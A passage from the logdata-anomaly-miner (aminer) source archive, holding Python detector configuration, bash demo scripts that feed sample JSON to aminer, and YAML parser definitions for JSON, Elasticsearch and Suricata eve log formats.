tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ 
'/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function, output_logline=True) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) import re ip_match_action = Rules.EventGenerationMatchAction( "Analysis.Rules.IPv4InRFC1918MatchRule", "Private IP address occurred!", anomaly_event_handlers) vdmt = Rules.ValueDependentModuloTimeMatchRule(None, 3, ["/model/ECD/j", "/model/ECD/k", "/model/ECD/l"], {b"e": [0, 2.95]}, [0, 3]) mt = Rules.ModuloTimeMatchRule(None, 3, 0, 3, None) time_allowlist_rules = [ Rules.AndMatchRule([ Rules.ParallelMatchRule([ Rules.ValueDependentDelegatedMatchRule([ '/model/ECD/g', '/model/ECD/h', '/model/ECD/i', '/model/ECD/j', '/model/ECD/k', '/model/ECD/l'], { (b"a",): mt, (b"b",): mt, (b"c",): mt, (b"d",): vdmt, (b"e",): vdmt, (b"f",): vdmt, None: mt}, mt), Rules.IPv4InRFC1918MatchRule("/model/ParsingME/se2/IpAddressDataModelElement", ip_match_action), Rules.DebugHistoryMatchRule(debug_match_result=True) ]), # IP addresses 8.8.8.8, 8.8.4.4 and 10.0.0.0 - 10.255.255.255 are not allowed Rules.NegationMatchRule(Rules.ValueListMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", [134744072, 134743044])), Rules.NegationMatchRule(Rules.ValueRangeMatchRule("/model/ParsingME/se2/IpAddressDataModelElement", 167772160, 184549375)), Rules.NegationMatchRule(Rules.StringRegexMatchRule("/model/type/syscall/success", re.compile(b"^no$"))) ]) ] time_allowlist_violation_detector = AllowlistViolationDetector( analysis_context.aminer_config, time_allowlist_rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_allowlist_violation_detector, component_name="TimeAllowlist") atom_filter.add_handler(time_allowlist_violation_detector) from aminer.analysis.HistogramAnalysis import 
HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers, output_logline=True) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, [ '/model/Random'], 100, 10, output_logline=True) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = 
NewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, output_logline=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector(analysis_context.aminer_config, [ '/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=[ '/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filter.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True, output_logline=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5, output_logline=True) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = 
TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=10000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers, output_logline=True) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/000077500000000000000000000000001437606560100256635ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/aminerJsonInputDemo.sh000077500000000000000000000032411437606560100321540ustar00rootroot00000000000000#!/bin/bash . 
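./testFunctions.sh
# Helper functions (runAminerUntilEnd) come from testFunctions.sh, sourced above.
#
# Demo: write a few JSON documents in different line layouts to a scratch log
# file and let aminer parse them with the JSON-input demo configuration.
#
# NOTE(review): the persistence directory lives under world-writable /tmp and
# is cleaned with "sudo rm -r" and re-owned with "sudo chown -R". If another
# local user had pre-created /tmp/lib or /tmp/lib/aminer as a symlink, those
# commands would act on the link target. The check below refuses to run in
# that case; it does not close the window between the check and the sudo
# calls, so this demo is only meant for single-user test machines.
LOGFILE=/tmp/syslog
PERSIST_DIR=/tmp/lib/aminer

for p in /tmp/lib "$PERSIST_DIR"; do
  if [ -L "$p" ] || { [ -e "$p" ] && ! [ -d "$p" ]; }; then
    echo "$p exists but is not a plain directory, refusing to continue"
    exit 1
  fi
done

# Recreate an empty persistence directory owned by the aminer user. Errors
# (e.g. the directory already exists) are deliberately ignored, as before.
sudo mkdir -p "$PERSIST_DIR" 2> /dev/null
sudo chown -R "$USER:$USER" "$PERSIST_DIR" 2> /dev/null
sudo rm -r "$PERSIST_DIR"/* 2> /dev/null
sudo mkdir "$PERSIST_DIR/log" 2> /dev/null
sudo chown -R aminer:aminer "$PERSIST_DIR" 2> /dev/null
sudo rm "$LOGFILE" 2> /dev/null

echo "Demo started.."
echo ""

FILE=/tmp/json-input-demo-config.yml
if ! test -f "$FILE"; then
  echo "$FILE does not exist!"
  exit 1
fi

# Each "read -r -d '' VAR" reads a whole here-document into VAR. It returns
# non-zero when it reaches the end of the here-document, which is expected
# here - do not add "set -e" without accounting for that.

# start json in same line
read -r -d '' VAR << END
{"menu": {
  "id": "file",
  "value": "File",
  "popup": {
    "menuitem": [
      {"value": "New", "onclick": "CreateNewDoc()"},
      {"value": "Open", "onclick": "OpenDoc()"},
      {"value": "Close", "onclick": "CloseDoc()"}
    ]
  }
}}
END
echo "$VAR" >> "$LOGFILE"

# start json in new line
read -r -d '' VAR << END
{
  "menu": {
    "id": "file",
    "value": "File",
    "popup": {
      "menuitem": [
        {"value": "New", "onclick": "CreateNewDoc()"},
        {"value": "Open", "onclick": "OpenDoc()"},
        {"value": "Close", "onclick": "CloseDoc()"}
      ]
    }
  }
}
END
# This document was previously read into VAR but never written, so the demo
# silently skipped the "json starts on a new line" case; append it like the
# other two.
echo "$VAR" >> "$LOGFILE"

# start everything in new line
read -r -d '' VAR << END
{
  "menu": {
    "id": "file",
    "value": "File",
    "popup": {
      "menuitem": [
        {
          "value": "New",
          "onclick": "CreateNewDoc()"
        },
        {
          "value": "Open",
          "onclick": "OpenDoc()"},
        {
          "value": "Close",
          "onclick": "CloseDoc()"}
      ]
    }
  }
}
END
echo "$VAR" >> "$LOGFILE"

runAminerUntilEnd "sudo aminer --config $FILE" "$LOGFILE" "$PERSIST_DIR/AnalysisChild/RepositioningData" "$FILE"
exit $?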
logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-aminer-demo.yml000066400000000000000000000101121437606560100315450ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/aminer.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: component_id type: DecimalIntegerValueModelElement name: 'component_id' - id: component_type type: FixedWordlistDataModelElement name: 'component_type' args: - 'AllowlistViolationDetector' - 'EnhancedNewMatchPathValueComboDetector' - 'EventCorrelationDetector' - 'EventFrequencyDetector' - 'EventSequenceDetector' - 'EventTypeDetector' - 'HistogramAnalysis' - 'PathDependentHistogramAnalysis' - 'MatchFilter' - 'MatchValueAverageChangeDetector' - 'MatchValueStreamWriter' - 'MissingMatchPathValueDetector' - 'MissingMatchPathListValueDetector' - 'NewMatchIdValueComboDetector' - 'NewMatchPathDetector' - 'NewMatchPathValueComboDetector' - 'NewMatchPathValueDetector' - 'ParserCount' - 'TimeCorrelationDetector' - 'TimeCorrelationViolationDetector' - 'TimestampsUnsortedDetector' - 'VariableCorrelationDetector' - 'VariableTypeDetector' - id: component_name type: VariableByteDataModelElement name: 'component_name' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.' 
- id: message type: VariableByteDataModelElement name: 'message' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-.()' - id: persistence_name type: FixedWordlistDataModelElement name: 'persistence_name' args: - 'Default' - 'suricata_fileinfo' - 'syslog_disconnected_user' - 'exim_no_host_name_found_ip' - 'suricata_err' - id: atom_paths type: VariableByteDataModelElement name: 'atom_paths' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789_-/' - id: affected_values type: AnyByteDataModelElement name: 'affected_values' - id: timestamps_no_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s' - id: timestamps_with_milliseconds type: DateTimeModelElement name: 'timestamps' date_format: '%s.%f' - id: timestamps type: FirstMatchModelElement name: 'timestamps' args: - timestamps_with_milliseconds - timestamps_no_milliseconds - id: log_lines_count type: DecimalIntegerValueModelElement name: 'log_lines_count' - id: json start: True type: JsonModelElement name: 'model' optional_key_prefix: '_' key_parser_dict: AnalysisComponent: AnalysisComponentIdentifier: component_id AnalysisComponentType: component_type AnalysisComponentName: component_name Message: message PersistenceFileName: persistence_name AffectedLogAtomPaths: - atom_paths _AffectedLogAtomValues: - affected_values ParsedLogAtom: 'ALLOW_ALL' LogData: RawLogData: - 'ALLOW_ALL' Timestamps: - timestamps LogLinesCount: log_lines_count Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-demo.sh000077500000000000000000000015211437606560100301140ustar00rootroot00000000000000#!/bin/bash . 
./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Demo started.." echo "" CFG_PATH=$1 OUT=$2 if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi FOUND=false LOGFILE="" while read p; do if [[ $FOUND = true ]]; then LOGFILE="$p" break fi if [[ "$p" == "LogResourceList:" ]]; then FOUND=true fi done < $CFG_PATH IFS="'" read -ra ADDR <<< "$LOGFILE" LOGFILE="${ADDR[1]:7}" # remove the file:// prefix. runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/tmp/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "$OUT" exit $? logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-elastic-demo.yml000066400000000000000000000123021437606560100317210ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/elastic.log' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: _scroll_id type: Base64StringModelElement name: '_scroll_id' - id: took type: DecimalIntegerValueModelElement name: 'took' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'timed_out' args: - 'true' - 'false' - id: total type: DecimalIntegerValueModelElement name: 'total' - id: successful type: DecimalIntegerValueModelElement name: 'successful' - id: skipped type: DecimalIntegerValueModelElement name: 'skipped' - id: failed 
type: DecimalIntegerValueModelElement name: 'failed' - id: value type: DecimalIntegerValueModelElement name: 'value' - id: relation type: FixedDataModelElement name: 'relation' args: 'eq' - id: max_score type: DecimalFloatValueModelElement name: 'max_score' - id: _index type: DateTimeModelElement name: '_index' date_format: 'aminer-statusinfo-%Y.%m.%d' - id: _type type: FixedDataModelElement name: '_type' args: '_doc' - id: _id type: VariableByteDataModelElement name: '_id' args: 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_' - id: _score type: DecimalFloatValueModelElement name: '_score' - id: FromTime type: DecimalFloatValueModelElement name: 'FromTime' exponent_type: 'mandatory' - id: /parser/model/php type: DecimalIntegerValueModelElement name: '/parser/model/php' - id: /parser/model/event_type_str type: DecimalIntegerValueModelElement name: '/parser/model/event_type_str' - id: /parser/model/type_str type: DecimalIntegerValueModelElement name: '/parser/model/type_str' - id: /parser/model/classification type: DecimalIntegerValueModelElement name: '/parser/model/classification' - id: /parser/model/status_code type: DecimalIntegerValueModelElement name: '/parser/model/status_code' - id: /parser/model/host type: DecimalIntegerValueModelElement name: '/parser/model/host' - id: /parser/model/sp type: DecimalIntegerValueModelElement name: '/parser/model/sp' - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: ToTime type: DecimalFloatValueModelElement name: 'ToTime' exponent_type: 'mandatory' - id: fromtimestamp type: DateTimeModelElement name: 'fromtimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: totimestamp type: DateTimeModelElement name: 'totimestamp' date_format: '%Y-%m-%dT%H:%M:%S.%fZ' - id: version type: FixedDataModelElement name: 'version' args: '1' - id: json start: True type: JsonModelElement name: 'model' key_parser_dict: _scroll_id: _scroll_id took: took timed_out: bool_wordlist 
terminated_early: bool_wordlist _shards: total: total successful: successful skipped: skipped failed: failed hits: total: value: value relation: relation max_score: max_score hits: - _index: _index _type: _type _id: _id _score: _score _source: FromTime: FromTime StatusInfo: /parser/model/php: /parser/model/php /parser/model/event_type_str: /parser/model/event_type_str /parser/model/type_str: /parser/model/type_str /parser/model/classification: /parser/model/classification /parser/model/status_code: /parser/model/status_code /parser/model/host: /parser/model/host /parser/model/sp: /parser/model/sp timestamp: timestamp ToTime: ToTime fromtimestamp: fromtimestamp totimestamp: totimestamp version: version Input: timestamp_paths: None json_format: True EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json-eve-demo.yml000066400000000000000000000613441437606560100310660ustar00rootroot00000000000000LearnMode: True Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' Core.PersistencePeriod: 600 LogResourceList: - 'file:///tmp/json_logs/eve.json' MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime: 0 MailAlerting.MinAlertGap: 0 MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage: 1000 LogPrefix: 'Original log line: ' Log.StatisticsPeriod: 3600 Log.StatisticsLevel: 1 Log.DebugLevel: 1 Parser: - id: timestamp type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: _flow_id type: DecimalIntegerValueModelElement name: '_flow_id' - id: _in_iface type: FixedDataModelElement name: '_in_iface' args: 'eth0' - id: event_type type: FixedWordlistDataModelElement name: 'event_type' args: - 'dns' - 'http' - 'fileinfo' - 'stats' - 'flow' - 'alert' - 'tls' - id: ip_ipv4 type: IpAddressDataModelElement name: 
'ipv4' - id: ip_ipv6 type: VariableByteDataModelElement name: 'ipv6' args: 'abcdefABCDEF0123456789:' - id: _src_ip type: FirstMatchModelElement name: '_src_ip' args: - ip_ipv4 - ip_ipv6 - id: _src_port type: DecimalIntegerValueModelElement name: '_src_port' - id: _dest_ip type: FirstMatchModelElement name: '_dest_ip' args: - ip_ipv4 - ip_ipv6 - id: _dest_port type: DecimalIntegerValueModelElement name: '_dest_port' - id: _proto type: FixedWordlistDataModelElement name: '_proto' args: - 'UDP' - 'TCP' - 'IPv6-ICMP' - id: _icmp_type type: DecimalIntegerValueModelElement name: '_icmp_type' - id: _icmp_code type: DecimalIntegerValueModelElement name: '_icmp_code' - id: type type: FixedWordlistDataModelElement name: 'type' args: - 'answer' - 'query' - id: id type: DecimalIntegerValueModelElement name: 'id' - id: _rcode type: FixedDataModelElement name: '_rcode' args: 'NXDOMAIN' - id: rrname_ip_lower type: DelimitedDataModelElement name: 'rrname_ip_lower' delimiter: '.in-addr.arpa' - id: rrname_addr_lower type: FixedDataModelElement name: 'rrname_addr_lower' args: '.in-addr.arpa' - id: rrname_lower type: SequenceModelElement name: 'rrname' args: - rrname_ip_lower - rrname_addr_lower - id: rrname_ip_upper type: DelimitedDataModelElement name: 'rrname_ip_upper' delimiter: '.IN-ADDR.ARPA' - id: rrname_addr_upper type: FixedDataModelElement name: 'rrname_addr_upper' args: '.IN-ADDR.ARPA' - id: rrname_upper type: SequenceModelElement name: 'rrname' args: - rrname_ip_upper - rrname_addr_upper - id: rrname type: FirstMatchModelElement name: 'rrname' args: - rrname_lower - rrname_upper - id: _rrtype type: FixedWordlistDataModelElement name: '_rrtype' args: - 'SOA' - 'PTR' - id: _ttl type: DecimalIntegerValueModelElement name: '_ttl' - id: _tx_id type: DecimalIntegerValueModelElement name: '_tx_id' - id: hostname type: FixedDataModelElement name: 'hostname' args: 'mail.spiral.com' - id: url type: VariableByteDataModelElement name: 'url' args: 
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_.;&=+$,/?%#\ - id: http_user_agent type: FixedWordlistDataModelElement name: 'http_user_agent' args: - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0' - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 HeadlessChrome/77.0.3865.90 Safari/537.36' - id: _http_content_type type: FixedWordlistDataModelElement name: '_http_content_type' args: - 'text/html' - 'image/png' - 'application/javascript' - 'text/css' - 'image/vnd.microsoft.icon' - 'application/json' - 'image/gif' - 'audio/x-wav' - id: http_refer_base_url type: FixedDataModelElement name: 'http_refer_base_url' args: 'http://mail.spiral.com/' - id: optional_http_refer_base_url type: OptionalMatchModelElement name: 'optional_http_refer_base_url' args: http_refer_base_url - id: _http_refer type: SequenceModelElement name: '_http_refer' args: - http_refer_base_url - url - id: http_method type: FixedWordlistDataModelElement name: 'http_method' args: - 'GET' - 'POST' - id: protocol type: FixedDataModelElement name: 'protocol' args: 'HTTP/1.1' - id: _status type: DecimalIntegerValueModelElement name: '_status' - id: _redirect type: SequenceModelElement name: '_redirect' args: - optional_http_refer_base_url - url - id: length type: DecimalIntegerValueModelElement name: 'length' - id: _app_proto type: FixedWordlistDataModelElement name: '_app_proto' args: - 'http' - 'failed' - 'dns' - 'tls' - id: _app_proto_tc type: FixedDataModelElement name: '_app_proto_tc' args: 'http' - id: file_state type: FixedWordlistDataModelElement name: 'state' args: - 'CLOSED' - 'TRUNCATED' - id: bool_wordlist type: FixedWordlistDataModelElement name: 'bool' args: - 'true' - 'false' - id: size type: DecimalIntegerValueModelElement name: 'size' - id: pkts_toserver type: DecimalIntegerValueModelElement name: 'pkts_toserver' - id: pkts_toclient type: DecimalIntegerValueModelElement name: 'pkts_toclient' 
- id: bytes_toserver type: DecimalIntegerValueModelElement name: 'bytes_toserver' - id: bytes_toclient type: DecimalIntegerValueModelElement name: 'bytes_toclient' - id: start type: DateTimeModelElement name: 'start' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: end type: DateTimeModelElement name: 'end' date_format: '%Y-%m-%dT%H:%M:%S.%f%z' - id: age type: DecimalIntegerValueModelElement name: 'age' - id: conn_state type: FixedWordlistDataModelElement name: 'state' args: - 'established' - 'closed' - 'fin_wait2' - 'new' - id: reason type: FixedWordlistDataModelElement name: 'reason' args: - 'timeout' - id: uptime type: DecimalIntegerValueModelElement name: 'uptime' - id: kernel_packets type: DecimalIntegerValueModelElement name: 'kernel_packets' - id: kernel_drops type: DecimalIntegerValueModelElement name: 'kernel_drops' - id: pkts type: DecimalIntegerValueModelElement name: 'pkts' - id: bytes type: DecimalIntegerValueModelElement name: 'bytes' - id: invalid type: DecimalIntegerValueModelElement name: 'invalid' - id: ipv4 type: DecimalIntegerValueModelElement name: 'ipv4' - id: ipv6 type: DecimalIntegerValueModelElement name: 'ipv6' - id: ethernet type: DecimalIntegerValueModelElement name: 'ethernet' - id: raw type: DecimalIntegerValueModelElement name: 'raw' - id: null_counts type: DecimalIntegerValueModelElement name: 'null' - id: sll type: DecimalIntegerValueModelElement name: 'sll' - id: tcp type: DecimalIntegerValueModelElement name: 'tcp' - id: udp type: DecimalIntegerValueModelElement name: 'udp' - id: sctp type: DecimalIntegerValueModelElement name: 'sctp' - id: icmpv4 type: DecimalIntegerValueModelElement name: 'icmpv4' - id: icmpv6 type: DecimalIntegerValueModelElement name: 'icmpv6' - id: ppp type: DecimalIntegerValueModelElement name: 'ppp' - id: pppoe type: DecimalIntegerValueModelElement name: 'pppoe' - id: gre type: DecimalIntegerValueModelElement name: 'gre' - id: vlan type: DecimalIntegerValueModelElement name: 'vlan' - id: vlan_qinq type: 
DecimalIntegerValueModelElement name: 'vlan_qinq' - id: teredo type: DecimalIntegerValueModelElement name: 'teredo' - id: ipv4_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv4_in_ipv6' - id: ipv6_in_ipv6 type: DecimalIntegerValueModelElement name: 'ipv6_in_ipv6' - id: mpls type: DecimalIntegerValueModelElement name: 'mpls' - id: avg_pkt_size type: DecimalIntegerValueModelElement name: 'avg_pkt_size' - id: max_pkt_size type: DecimalIntegerValueModelElement name: 'max_pkt_size' - id: erspan type: DecimalIntegerValueModelElement name: 'erspan' - id: invalid_ip_version type: DecimalIntegerValueModelElement name: 'invalid_ip_version' - id: pkt_too_small type: DecimalIntegerValueModelElement name: 'pkt_too_small' - id: unsupported_type type: DecimalIntegerValueModelElement name: 'unsupported_type' - id: memcap type: DecimalIntegerValueModelElement name: 'memcap' - id: spare type: DecimalIntegerValueModelElement name: 'spare' - id: emerg_mode_entered type: DecimalIntegerValueModelElement name: 'emerg_mode_entered' - id: emerg_mode_over type: DecimalIntegerValueModelElement name: 'emerg_mode_over' - id: tcp_reuse type: DecimalIntegerValueModelElement name: 'tcp_reuse' - id: memuse type: DecimalIntegerValueModelElement name: 'memuse' - id: fragments type: DecimalIntegerValueModelElement name: 'fragments' - id: reassembled type: DecimalIntegerValueModelElement name: 'reassembled' - id: timeouts type: DecimalIntegerValueModelElement name: 'timeouts' - id: max_frag_hits type: DecimalIntegerValueModelElement name: 'max_frag_hits' - id: sessions type: DecimalIntegerValueModelElement name: 'sessions' - id: ssn_memcap_drop type: DecimalIntegerValueModelElement name: 'ssn_memcap_drop' - id: pseudo type: DecimalIntegerValueModelElement name: 'pseudo' - id: pseudo_failed type: DecimalIntegerValueModelElement name: 'pseudo_failed' - id: invalid_checksum type: DecimalIntegerValueModelElement name: 'invalid_checksum' - id: no_flow type: DecimalIntegerValueModelElement name: 
'no_flow' - id: syn type: DecimalIntegerValueModelElement name: 'syn' - id: synack type: DecimalIntegerValueModelElement name: 'synack' - id: rst type: DecimalIntegerValueModelElement name: 'rst' - id: segment_memcap_drop type: DecimalIntegerValueModelElement name: 'segment_memcap_drop' - id: stream_depth_reached type: DecimalIntegerValueModelElement name: 'stream_depth_reached' - id: reassembly_gap type: DecimalIntegerValueModelElement name: 'reassembly_gap' - id: reassembly_memuse type: DecimalIntegerValueModelElement name: 'reassembly_memuse' - id: alert type: DecimalIntegerValueModelElement name: 'alert' - id: http type: DecimalIntegerValueModelElement name: 'http' - id: ftp type: DecimalIntegerValueModelElement name: 'ftp' - id: smtp type: DecimalIntegerValueModelElement name: 'smtp' - id: tls type: DecimalIntegerValueModelElement name: 'tls' - id: ssh type: DecimalIntegerValueModelElement name: 'ssh' - id: imap type: DecimalIntegerValueModelElement name: 'imap' - id: msn type: DecimalIntegerValueModelElement name: 'msn' - id: smb type: DecimalIntegerValueModelElement name: 'smb' - id: dcerpc_tcp type: DecimalIntegerValueModelElement name: 'dcerpc_tcp' - id: dns_tcp type: DecimalIntegerValueModelElement name: 'dns_tcp' - id: failed_tcp type: DecimalIntegerValueModelElement name: 'failed_tcp' - id: dcerpc_udp type: DecimalIntegerValueModelElement name: 'dcerpc_udp' - id: dns_udp type: DecimalIntegerValueModelElement name: 'dns_udp' - id: failed_udp type: DecimalIntegerValueModelElement name: 'failed_udp' - id: closed_pruned type: DecimalIntegerValueModelElement name: 'closed_pruned' - id: new_pruned type: DecimalIntegerValueModelElement name: 'new_pruned' - id: est_pruned type: DecimalIntegerValueModelElement name: 'est_pruned' - id: bypassed_pruned type: DecimalIntegerValueModelElement name: 'bypassed_pruned' - id: flows_checked type: DecimalIntegerValueModelElement name: 'flows_checked' - id: flows_notimeout type: DecimalIntegerValueModelElement name: 
